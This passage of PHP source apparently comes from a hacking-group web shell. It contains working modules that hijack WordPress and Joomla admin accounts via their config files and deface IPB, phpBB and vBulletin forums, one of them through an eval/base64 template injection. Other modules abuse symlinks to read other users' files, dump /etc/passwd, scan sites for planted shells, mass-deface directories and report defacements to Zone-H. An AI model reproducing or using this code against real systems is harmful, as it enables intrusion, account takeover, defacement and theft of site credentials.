1826<td height="167" width="780"><p align="center"> <textarea name="index3" cols=53 rows=9> <br><center>Hacked By Phenomene Dz <br><center>[ Martyrs Crew ]<br>#Algerian Hacker <br><center>#Free Pilastine <br><center>#www.fb.com/J1jeI
1827 </textarea><p align="center"><input type="hidden" name="a" value="ipb"><input type = "submit" value = "Deface !">
1828<input type = "reset" value = "Clear"></td>
1829</tr>
1830</tr>
1831</table>';
1832$localhost3 = $_POST['f10'];
1833$database3 = $_POST['f11'];
1834$username3 = $_POST['f12'];
1835$password3 = $_POST['f13'];
1836$IPB = $_POST['f14'];
1837$index3 = $_POST['index3'];
1838if($database3=$_POST['f11']){
1839$con3 =@ mysql_connect($localhost3,$username3,$password3) or die;
1840$db3 =@ mysql_select_db($database3,$con3) or die;
1841
1842$query3 = "UPDATE $IPB SET set_cache_wrapper = '$index3'" or die;
1843$result3 =@ mysql_query($query3,$con3);
1844if($result3){
1845echo "<p align='center'>
1846<marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Update Finish ]----[ Mr.511 ]</marquee></p>";
1847}
1848else {
1849echo "<p align='center'><marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Please Check Database Information ]----[ Mr.511 ]</marquee></p>";
1850}
1851}
1852wsoFooter(); }
1853######################## wp key ############################
1854function actionwpkey() {
1855wsoHeader();
1856{
1857if(empty($_POST['pwd'])){
1858
1859echo "<br><br><center><div class='mybox'>
1860<h1>[ Wordpress login changer ]</h1>
1861<FORM method='POST'>DB Prefix : <INPUT class ='inputz' size='8' value='wp_' name='prefix' type='text'> Host : <INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'> db : <INPUT class ='inputz' size='10' value='Database' name='database' type='text'> User : <INPUT class ='inputz' size='10' value='db_user' name='username' type='text'> Pass : <INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'> <br><br>New User : <INPUT class ='inputz' name='admin' size='15' value='jijle3'><br><br>New Pass : <INPUT class ='inputz' name='pwd' size='15' value='19620705'><br> <br><input type='hidden' name='a' value='wpkey' ><INPUT class='inputzbut' value='Change it Please' name='send' type='submit'></FORM></div/></center>";
1862}
1863else{$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];
1864$username= $_POST['username'];
1865$password= $_POST['password'];
1866$pwd= $_POST['pwd'];
1867$admin= $_POST['admin'];
1868@mysql_connect($localhost,$username,$password) or die(mysql_error());
1869@mysql_select_db($database) or die(mysql_error());
1870$hash = crypt($pwd);
1871$grab = @mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1872$data = @mysql_fetch_array($grab);
1873$site_url=$data["option_value"];
1874$jijle3=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
1875$jijle3=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
1876if($jijle3){echo '<br><br><center><h1>Done ... -> <a href="'.$site_url.'/wp-login.php" target="_blank">Login</a></h1></center>';
1877}}
1878echo '</center>';
1879}
1880wsoFooter(); }
1881######################## wp sym ############################
1882function actionwpsym() {
1883wsoHeader();
1884if ($_POST['kill']) {
1885$url = $_POST['url'];
1886$user = $_POST['user'];$pass =$_POST['pass'];
1887$pss = md5($pass);
1888function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);
1889return $explode[0];}$config = file_get_contents($url);$password = enter($config,"define('DB_PASSWORD', '","');");
1890$username = enter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME', '","');");$prefix = enter($config,'$table_prefix = \'',"';");$host = enter($config,"define('DB_HOST', '","');");if($config && preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");if ($query) {echo '<center><h2 class="jijle3">Done !</h2></center><br><table width="100%"><tr><th width="20%">site</th><th width="20%">user</th><th with="20%">password</th><th width="20%">link</th></tr><tr><td width="20%"><font size="2" color="red">'.$site_url.'</font></td><td width="20%">'.$user.'</td><td with="20%">'.$pass.'</td><td width="20%"><a href="'.$site_url.'/wp-login.php"><font color="#00ff00">login</font></td></tr></table>';} else echo '<h2 class="jijle3"><font color="#ff0000">ERROR !</font></h2>';} else die('<center><h2 class="jijle3">Jijle3@phdz:~# This is Not WordPress Config !</h2>');} else { ?> <center><br><br><div class="mybox"><form method="post">
1891<h1 style='font-size:26px;' class='jijle3'>[ Wordpress Login changer From Config ]</h1>
1892<br>
1893<table><tr><td>Config File Link : </td><td>
1894<input size="26" class="inputz" type="text" name="url" value="">
1895</td></tr><tr><td>New User : </td><td>
1896<input class="inputz" type="text" name="user" size="26" value="jijle3"></td>
1897</tr><tr><td>New Pass : </td><td>
1898<input class="inputz" type="text" size="26" name="pass" value="jijle3"></td></tr><tr><td>
1899<br></td></tr><tr><td>
1900<input type="hidden" name="a" value="wpsym"><input class="inputzbut" type="submit" name="kill" value=" Change it Please "></td>
1901<br></tr></table></form></div>
1902</center><?php }
1903wsoFooter();
1904######################## joomla sym ############################
1905function actionjmsym() {
1906wsoHeader();
1907{
1908if ($_POST['symjo']) {
1909$config = file_get_contents($_POST['url']);
1910$user = $_POST['user'];
1911$pass = md5($_POST['pass']);
1912function ex($text,$a,$b){
1913$explode = explode($a,$text);
1914$explode = explode($b,$explode[1]);
1915return $explode[0];
1916}
1917if($config && ereg('JConfig',$config)){
1918$psswd = ex(
1919$config,'$password = \'',"';");
1920$username = ex($config,'$user = \'',"';");
1921$dbname = ex($config,'$db = \'',"';");
1922$prefix = ex($config,'$dbprefix = \'',"';");
1923$host = ex($config,'$host = \'',"';");
1924$email = ex($config,'$mailfrom = \'',"';");
1925$formn = ex($config,'$fromname = \'',"';");
1926$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);
1927$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");
1928if ($query) {
1929echo '<center><h2 class="jijle3">Done !</h2></center><br><table width="100%"><tr><th width="30%">site name</th><th width="20%">user</th><th width="20%">password</th><th width="20%">email</th></tr><tr><td width="20%"><font size="2" color="red">'.$formn.'</font></td><td width="20%">'.$user.'</td><td with="20%">'.$_POST["pass"].'</td><td width="20%">'.$email.'</td></tr></table>';}else {echo '<h2 class="jijle3"><font color="#ff0000">ERROR !</font></h2>';}}else die('<h2 class="jijle3"><font color="#df5">Jijle3@phdz:~# This is Not Joomla Config . . <br><br> # i Will Drive if You Are Drunk !</font></h2>');
1930}
1931else {
1932?>
1933<center><br><br><div class="mybox">
1934<form method="post"><table>
1935<h1 class="jijle3">Joomla Login Changer From Config</h1>
1936<tr><td>config link : </td><td><input class="inputz" type="text" name="url" value=""></td></tr><tr><td>new user : </td><td><input class="inputz" type="text" name="user" value="admin"></td></tr><tr><td>new password : </td><td><input class="inputz" type="text" name="pass" value="123123"></td></tr><tr><td><br></td></tr><tr><td><input type="hidden" name="a" value="jmsym"><input type="submit" class="inputzbut" name="symjo" value="change"></td><br></tr></table></form></div></center><?php }}
1937wsoFooter(); }
1938######################## joomla key ############################
1939function actionjmkey() {
1940wsoHeader();
1941{
1942if(empty($_POST['pwd']))
1943{
1944echo "<br><br><br><center><div class='mybox'><h1>Joomla login changer</h1><FORM method='POST'><br><br><br>DB_Prefix : <INPUT class ='inputz' size='8' value='jos_' name='prefix' type='text'> host :
1945<INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'> database : <INPUT class ='inputz' size='10' value='database' name='database' type='text'> username : <INPUT class ='inputz' size='10' value='db_user' name='username' type='text'> password : <INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'><br> <br>New Username: <INPUT class ='inputz' name='admin' size='15' value='jijle3'><br><br>New Password: <INPUT class ='inputz' name='pwd' size='15' value='123123'><br><br> <input type='hidden' name='a' value='jmkey'><INPUT value='change' class='inputzbut' name='send' type='submit'></FORM></div></center>";
1946}
1947else {$prefix = $_POST['prefix'];
1948$localhost = $_POST['localhost'];
1949$database = $_POST['database'];
1950$username = $_POST['username'];
1951$password = $_POST['password'];
1952$admin = $_POST['admin'];
1953$pd = ($_POST["pwd"]);
1954$pwd = md5($pd);@mysql_connect(
1955$localhost,$username,$password) or die (mysql_error());
1956@mysql_select_db($database) or die (mysql_error());
1957$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());
1958$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());
1959if($SQL) echo "<br><br><center><h1>Password Changed ! ... Go and login</h1></center>";}}
1960wsoFooter(); }
1961######################## vb index ######################
1962function actionvbindex() {
1963wsoHeader();
1964{
1965if(empty($_POST['index']))
1966{
1967echo "<center><br><br><div width='100%' class='mybox'><br><h1 class='jijle3'>Vbulletin index changer</h1>
1968<br><FORM method='POST'>host : <INPUT size='12' class='inputz' value='localhost' name='localhost' type='text'> | database : <INPUT class='inputz' size='12' value='db_name' name='database' type='text'> | username : <INPUT class='inputz' size='10' value='db_user' name='username' type='text'> | password : <INPUT class='inputz' size='10' value='bd_pass' name='password' type='text'> | perfix : <input class='inputz' size='10' value='' name='perfix' type='text'><br><br><textarea class='inputz' name='index' cols='40' rows='10'>
1969<br><center>Hacked By Phenomene Dz <br><center>[ Martyrs Crew ]<br>#Algerian Hacker <br><center>#Free Pilastine <br><center>#www.fb.com/J1jeI
1970</textarea><br><input type='hidden' name='a' value='vbindex'><INPUT class='inputzbut' value='Deface' name='send' type='submit'></FORM></div></center>";
1971}
1972else{$localhost = $_POST['localhost'];
1973$database = $_POST['database'];
1974$username = $_POST['username'];
1975$password = $_POST['password'];
1976$perfix = $_POST['perfix'];
1977$index = $_POST['index'];
1978@mysql_connect($localhost,$username,$password) or die(mysql_error());
1979@mysql_select_db($database) or die(mysql_error());
1980$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";
1981$set_index .= base64_encode("echo '$index';");
1982$set_index .= "\'))}}{\${exit()}}</textarea>";
1983$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());
1984if($ok){echo "Hamd Li Allah . . . Vb Forum Has Been DEFACED ! <br><br>";
1985}}}
1986wsoFooter(); }
1987####################### {Smylink } ##############################
1988function actionsym() {
1989wsoHeader();
1990//Smylinker
1991echo'
1992<center>
1993<h1>File Symlink</h1>
1994<br /><br />
1995<form method="post">
1996<input type="hidden" name="a" value="sym">
1997<input type="text" name="file" value="/var/www/" size="50"/><br /><br />
1998<input type="text" name="symfile" value="algeria.txt" size="50"/><br /><br />
1999<input type="submit" value="symlink" name="symlink" /> <br /><br />
2000</form>
2001';
2002$pfile = $_POST['file'];
2003$symfile = $_POST['symfile'];
2004$symlink = $_POST['symlink'];
2005if ($symlink)
2006{
2007@mkdir('phdzsymF',0755);
2008$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
2009$f =@fopen ('phdzsymF/.htaccess','w');
2010@fwrite($f , $c);
2011@symlink("$pfile","phdzsymF/$symfile");
2012echo '<br /><a target="_blank" href="phdzsymF/'.$symfile.'" >'.$symfile.'</a>';
2013}
2014?></center><?php
2015wsoFooter();}
2016
2017
2018################ Etc/pwd ####################
2019function actionetcbaypass() {
2020wsoHeader();
2021//etc passwd
2022?></center><?php
2023echo '<br><center><h1>Etc Passwd Bypasser</h1><br>[ Bism Allah ]<center><br><br>';
2024echo '
2025<form method="post">
2026<input type="submit" value="Use [ System ] Function" name="syst">
2027<input type="hidden" name="a" value="etcbaypass">
2028</form>
2029</center><br>
2030</p>
2031
2032
2033<form method="post">
2034<font face="Tahoma" color="#007700" size="2pt">
2035<input type="submit" value="Use [ PassThru ] Function" name="passth">
2036<input type="hidden" name="a" value="etcbaypass">
2037</form>
2038</center><br>
2039</p>
2040
2041<p><center>
2042<form method="post">
2043<input type="submit" value="Use [ Exec ] Function" name="ex">
2044<input type="hidden" name="a" value="etcbaypass">
2045</form>
2046</center><br>
2047</p>
2048
2049<p><center>
2050<form method="post">
2051<input type="submit" value="Use [ Sh Exec ] Function" name="shex">
2052<input type="hidden" name="a" value="etcbaypass">
2053</form>
2054</center><br>
2055</p>
2056
2057<p><center>
2058<form method="post">
2059<input type="submit" value="Use [ Posix Getpwuid ] Function" name="dz">
2060<input type="hidden" name="a" value="etcbaypas">
2061</form>
2062</center><br>
2063</p>
2064
2065<center>';
2066
2067
2068//System Function //
2069if($_POST['syst'])
2070{
2071
2072echo"<textarea class='area' cols='65' rows='15'>";
2073echo system("cat /etc/passwd");
2074echo"</textarea><br>";
2075echo"
2076<br>
2077<b>
2078</b>
2079<br>
2080";
2081}
2082echo '
2083</center>
2084<center>';
2085
2086
2087
2088//Passthru Function //
2089if($_POST['passth'])
2090{
2091echo"<textarea class='area' cols='65' rows='15'>";
2092echo passthru("cat /etc/passwd");
2093echo"</textarea><br>";
2094echo"
2095<br>
2096<b>
2097
2098</b>
2099<br>
2100";
2101
2102}
2103
2104
2105echo '
2106</center>
2107<center>';
2108
2109
2110
2111//exec Function //
2112if($_POST['ex'])
2113{
2114echo"<textarea class='area' cols='65' rows='15'>";
2115echo exec("cat /etc/passwd");
2116echo"</textarea><br>";
2117echo"
2118<br>
2119<b>
2120</b>
2121<br>
2122";
2123}
2124
2125
2126echo '
2127</center>
2128<center>';
2129
2130
2131//exec Function //
2132if($_POST['shex'])
2133{
2134echo"<textarea class='area' cols='65' rows='15'>";
2135echo shell_exec("cat /etc/passwd");
2136echo"</textarea><br>";
2137echo"
2138<br>
2139<b>
2140</b>
2141<br>
2142";
2143}
2144echo '</center>
2145<center>';
2146
2147
2148
2149//posix_getpwuid Function //
2150if($_POST['dz'])
2151{
2152echo"<textarea class='area' cols='65' rows='15'>";
2153for($uid=0;$uid<60000;$uid++){
2154$ara = posix_getpwuid($uid);
2155if (!empty($ara)) {
2156while (list ($key, $val) = each($ara)){
2157print "$val:";
2158}
2159print "\n";
2160}
2161}
2162echo"</textarea><br>";
2163echo"
2164<br>
2165<b>
2166</b>
2167<br>
2168";
2169}
2170?></center><?php
2171wsoFooter();}
2172################################## Server User ##############################
2173function actionetcnmd() {
2174wsoHeader();
2175echo '<br><center><h1>Server User Bypasser</h1><br>[ Bism Allah ]<center><br><br>';
2176echo '
2177<div class="tul"><font color="ee5500" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
2178
2179<p><center>
2180<form method="post">
2181<input type="submit" value="Use [ AWK Programe ] Function" name="awk">
2182<input type="hidden" name="a" value="etcnmd">
2183</form>
2184</center><br>
2185</p>
2186
2187
2188<p><center>
2189<form method="post">
2190<input type="submit" value="Use [ Systeme ] Function" name="syst">
2191<input type="hidden" name="a" value="etcnmd">
2192</form>
2193</center><br>
2194</p>
2195
2196<p><center>
2197<form method="post">
2198<input type="submit" value="Use [ Passthru ] Function" name="passth">
2199<input type="hidden" name="a" value="etcnmd">
2200</form>
2201</center><br>
2202</p>
2203
2204<p><center>
2205<form method="post">
2206<input type="submit" value="Use [ Exec ] Function" name="ex">
2207<input type="hidden" name="a" value="etcnmd">
2208</form>
2209</center><br>
2210</p>
2211
2212<p><center>
2213<form method="post">
2214<input type="submit" value="Use [ Sh Exec ] Function" name="shex">
2215<input type="hidden" name="a" value="etcnmd">
2216</form>
2217</center><br>
2218</p><center>';
2219
2220
2221//Awk Program //
2222if ($_POST['awk']) {
2223echo"<textarea class='area' cols='65' rows='15'>";
2224echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
2225echo "</textarea><br>";
2226echo "
2227<br>
2228<b>
2229</b>
2230<br>
2231";
2232}
2233echo "</center><center>";
2234
2235//System Function //
2236if ($_POST['syst']) {
2237echo"<textarea class='area' cols='65' rows='15'>";
2238echo system("ls /var/mail");
2239echo "</textarea><br>";
2240echo "
2241<br>
2242<b>
2243</b>
2244<br>
2245";
2246}
2247
2248echo "</center><center>";
2249
2250//Passthru Function //
2251if ($_POST['passth']) {
2252echo"<textarea class='area' cols='65' rows='15'>";
2253echo passthru("ls /var/mail");
2254echo "</textarea><br>";
2255echo "
2256<br>
2257<b>
2258</b>
2259<br>
2260";
2261}
2262echo "</center><center>";
2263
2264//exec Function //
2265if ($_POST['ex']) {
2266echo"<textarea class='area' cols='65' rows='15'>";
2267echo exec("ls /var/mail");
2268echo "</textarea><br>";
2269echo "
2270<br>
2271<b>
2272
2273</b>
2274<br>
2275";
2276}
2277
2278echo "</center><center>";
2279
2280//exec Function //
2281if ($_POST['shex']) {
2282echo"<textarea class='area' cols='65' rows='15'>";
2283echo shell_exec("ls /var/mail");
2284echo "</textarea><br>";
2285echo "
2286<br>
2287<b>
2288</b>
2289<br>
2290";
2291}
2292?></center><?php
2293wsoFooter();}
2294##################### Shell Finder ####################
2295function actionshellfind() {
2296wsoHeader();
2297echo'<center>
2298<center><h1>Shell Finder<h1><br>
2299<p align="center"></p><br>
2300<form method="POST">
2301</form><center>
2302<form action="" method="post">
2303<input name="traget" type="text" size="100" value="http://www.site.co.il/"/><br>
2304<input type="hidden" name="a" value="shellfind">
2305<br><br>
2306<input name="scan" size="100" value="Start Scaning" type="submit">
2307</form><br>';
2308
2309set_time_limit(0);
2310
2311if (isset($_POST["scan"])) {
2312
2313$url = $_POST['traget'];
2314
2315echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
2316
2317$shells = array("WSO.php","shell.php","3xd.php","dz.php","priv8.php","sniper.php","dhanush shell.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
2318"x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
2319"Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
2320"vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
2321"d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
2322"wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
2323"wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
2324"tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
2325"tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
2326"whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
2327"templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
2328"admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
2329"/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
2330"/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
2331"/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
2332"/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
2333"/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
2334"wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
2335"tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/","ma.php", "tn.php", "wso.php.html", "shell.php", "dhanush.php",
2336"tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
2337"forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
2338"spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
2339"Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
2340"tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
2341"/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip");
2342
2343//Start Scan
2344foreach ($shells as $shell){
2345$headers = get_headers("$url$shell"); //
2346
2347if (eregi('200', $headers[0])) {
2348//Result
2349echo "<a href='$url$shell'>$url$shell</a> <span class='found'</span><br /><br/><br/>"; //
2350}
2351}
2352}
2353?></center><?php
2354wsoFooter();}
2355######################### Domains #########################
2356function actiondomains() {
2357wsoHeader();
2358echo '<center><h1>Server Domain</h1>';
2359$file = @implode(@file("/etc/named.conf"));
2360if(!$file){ die(" [/etc/named.conf] Not Writeable ! "); }
2361preg_match_all("#named/(.*?).db#",$file ,$r);
2362$domains = array_unique($r[1]);
2363//check();
2364//if(isset($_GET['ShowAll']))
2365{
2366echo "<table align=center border=1 width=59% cellpadding=5>
2367<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2368<tr><td>Domain</td><td>User</td></tr>";
2369foreach($domains as $domain){
2370$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2371 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2372 }
2373 echo "</table>";
2374 }
2375echo '</div>';
2376wsoFooter(); }
2377######################### Mass Deface #########################
2378function actionmass(){
2379wsoHeader();
2380?>
2381<head>
2382<center>
2383<span style="font-weight: 700;" class="style33">
2384 <h1>Folders Mass Defacer</h1></span></span></span><BR>
2385 </div>
2386<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
2387<div class="style31"><center>
2388<span>Directory : </span><br><input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'><BR><br>
2389<span>index Url : </span><br><input type='text' style='width: 250px' name='massdefaceurl'>
2390 </form></td>
2391<p class="style3">
2392<input type="hidden" name="a" value="mass"><input type='submit' name='execmassdeface' value='>>'></div>
2393<center><span>Rusult : <span>
2394<span <ul>
2395 <span class="style32">
2396 <span class="style39">
2397 </span></p>
2398<span style="font-weight: 700;" class="style33">
2399 <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);">
2400</center>
2401<div class="style31">
2402<html>
2403<?php
2404echo "<center><textarea rows='10' cols='100'>ph@dz:~# Jijle3 Mass Defacer | ";
2405$defaceurl = $_POST['massdefaceurl'];
2406$dir = $_POST['massdefacedir'];
2407echo $dir."\n";
2408if (is_dir($dir)) {
2409 if ($dh = opendir($dir)) {
2410 while (($file = readdir($dh)) !== false) {
2411 if(filetype($dir.$file)=="dir"){
2412 $newfile=$dir.$file."/index.html";
2413 echo $newfile."\n";
2414 if (!copy($defaceurl, $newfile)) {
2415 echo "ph@dz:~# Faild To Copy ! >> $file...";
2416 }
2417 }
2418 }
2419 closedir($dh);
2420 }
2421}
2422echo "</textarea></center>";
2423wsoFooter(); }
2424############## Domain #####################
2425function actionDomain(){
2426printHeader();
2427echo '<h1>local domain viewer</h1><div class=content>';
2428$file = @implode(@file("/etc/named.conf"));
2429if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
2430preg_match_all("#named/(.*?).db#",$file ,$r);
2431$domains = array_unique($r[1]);
2432//check();
2433//if(isset($_GET['ShowAll']))
2434{
2435echo "<table align=center border=1 width=59% cellpadding=5>
2436<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2437<tr><td>Domain</td><td>User</td></tr>";
2438foreach($domains as $domain){
2439$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2440 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2441 }
2442 echo "</table>";
2443 }
2444echo '</div>';
2445wsoFooter();
2446}
2447######################### Zone-h ############################
2448function actionzoneh() {
2449wsoHeader();
2450{
2451?>
2452<br><br><center>
2453<!-- Zone-H -->
2454<form action="" method='POST'><table><table class='tabnet'><tr>
2455<center>
2456<h1>Zone-H Mass Poster</h1>
2457<br /><br />
2458<font>Attaker Name<font><center><input type="text" class="inputz" name="defacer" value="Martyrs Crew" /><br>
2459<select name="hackmode" class="inputz" >
2460<option >------------------------ Select ------------------------</option>
2461<option value="1">known vulnerability (i.e. unpatched system)</option>
2462<option value="2" >undisclosed (new) vulnerability</option>
2463<option value="3" >configuration / admin. mistake</option>
2464<option value="4" >brute force attack</option>
2465<option value="5" >social engineering</option>
2466<option value="6" >Web Server intrusion</option>
2467<option value="7" >Web Server external module intrusion</option>
2468<option value="8" >Mail Server intrusion</option>
2469<option value="9" >FTP Server intrusion</option>
2470<option value="10" >SSH Server intrusion</option>
2471<option value="11" >Telnet Server intrusion</option>
2472<option value="12" >RPC Server intrusion</option>
2473<option value="13" >Shares misconfiguration</option>
2474<option value="14" >Other Server intrusion</option>
2475<option value="15" >SQL Injection</option>
2476<option value="16" >URL Poisoning</option>
2477<option value="17" >File Inclusion</option>
2478<option value="18" >Other Web Application bug</option>
2479<option value="19" >Remote administrative panel access bruteforcing</option>
2480<option value="20" >Remote administrative panel access password guessing</option>
2481<option value="21" >Remote administrative panel access social engineering</option>
2482<option value="22" >Attack against administrator(password stealing/sniffing)</option>
2483<option value="23" >Access credentials through Man In the Middle attack</option>
2484<option value="24" >Remote service password guessing</option>
2485<option value="25" >Remote service password bruteforce</option>
2486<option value="26" >Rerouting after attacking the Firewall</option>
2487<option value="27" >Rerouting after attacking the Router</option>
2488<option value="28" >DNS attack through social engineering</option>
2489<option value="29" >DNS attack through cache poisoning</option>
2490<option value="30" >Not available</option>
2491</select>
2492<select name="reason" class="inputz" >
2493<option >------------- Select ---------------</option>
2494<option value="1" >Heh...just for fun!</option>
2495<option value="2" >Revenge against that website</option>
2496<option value="3" >Political reasons</option>
2497<option value="4" >As a challenge</option>
2498<option value="5" >I just want to be the best defacer</option>
2499<option value="6" >Patriotism</option>
2500<option value="7" >Not available</option>
2501</select>
2502<input type="hidden" name="action" value="zone">
2503<center><textarea name="domain" cols="116" rows="9" id="domains">-Jijle3 : Sites Here</textarea>
2504<br /><input type="hidden" name="a" value="zoneh"><input class='inputzbut' type="submit" value="Send'it Please !" name="SendNowToZoneH" /><br></center></table>
2505</form></td></tr></table></form>
2506<!-- End Of Zone-H -->
2507</td></center><br><br>
2508<?php
2509echo '<center>';
2510 ob_start();
2511 $sub = get_loaded_extensions();
2512 if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
2513 $hacker = $_POST['defacer'];
2514 $method = $_POST['hackmode'];
2515 $neden = $_POST['reason'];
2516 $site = $_POST['domain'];
2517 if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
2518 elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
2519 elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
2520 elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
2521 $i = 0;
2522 $sites = explode("\n", $site);
2523 while($i < count($sites))
2524 {
2525 if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
2526 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2527 echo "Site : ".$sites[$i]." Defaced !\n";
2528 ++$i;
2529 }
2530 echo "[+] Sending Sites To Zone-H.org Has Been Completed Successfully ! ! ";
2531 echo '</center>';
2532}
2533wsoFooter();
2534}
2535######################### phpbb defacer ###########################
2536function actionphpbb() {
2537wsoHeader();
2538echo'<center><h1> PHPBB index Changer </h1>
2539<form method = "POST">
2540<table border = "1" width="443" height="316" style="text-align: center" align="center">
2541<tr>
2542<td height="105" width="780">
2543<p align="center"><b>Host : </b>
2544<input type="text" name="f5" size="20" value="localhost"> <b>
2545DataBase :</b> <input type ="text" name = "f6" size="20"></p>
2546<p align="center"> <b>User :</b> <input type ="text" name = "f7" size="20">
2547<b> Password :</b> <input type ="text" name = "f8" size="20"><p align="center">
2548<b>Table Prefix:</b><br>
2549<input type ="text" name = "f9" size="20" value="phpbb_forums"></td>
2550</tr>
2551<tr>
2552<td height="167" width="780"><p align="center"> <textarea name="index2" cols=50 rows=10> <br><center>Hacked By Phenomene Dz <br><center>[ Martyrs Crew ]<br>#Algerian Hacker <br><center>#Free Pilastine <br><center>#www.fb.com/J1jeI
2553 </textarea><p align="center"><input type="hidden" name="a" value="phpbb"><input type = "submit" value = "Deface !">
2554<input type = "reset" value = "Clear"></td>
2555</tr>
2556</tr>',
2557$localhost2 = $_POST['f5'];
2558$database2 = $_POST['f6'];
2559$username2 = $_POST['f7'];
2560$password2 = $_POST['f8'];
2561$index2 = $_POST['index2'];
2562$phpbb = $_POST['f9'];
2563if($database2=$_POST['f6']){
2564$con2 =@ mysql_connect($localhost2,$username2,$password2) or die;
